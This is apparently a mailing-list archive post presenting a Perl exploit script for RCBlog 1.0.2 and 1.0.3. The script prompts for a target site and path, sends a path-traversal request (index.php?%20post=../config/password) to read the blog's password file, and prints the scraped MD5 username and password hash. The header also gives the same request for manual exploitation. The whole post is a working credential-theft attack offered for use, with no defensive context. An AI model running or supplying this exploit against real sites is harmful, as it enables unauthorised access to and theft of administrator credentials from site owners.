<<< Date Index >>>     <<< Thread Index >>>

RCblog exploit [fun]



#!/usr/bin/perl
#
# RCBlog 1.0.3 / 1.0.2 
# Exploit by Hessam-x (www.hessamx.net)
# Name    : RCBlog (www.fluffington.com
# version : 1.0.3 / 1.0.2
# manual exploiting:
# index.php?%20post=../config/password  
#
use LWP::Simple;

print "-------------------------------------------\n";
print "=            RCBlog 1.0.3 / 1.0.2         =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";

        
        print "Target(http://www.example.com)\> ";
        chomp($targ = <STDIN>);
        
        print "Path: (/rcblog/)\>";
        chomp($path=<STDIN>);
        
$url = "index.php?%20post=../config/password";
$page = get($targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
$page =~ m/<div class="title">(.*?)<\/div>/ && print "[+] MD5 [Username]   
[Password]:\n $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);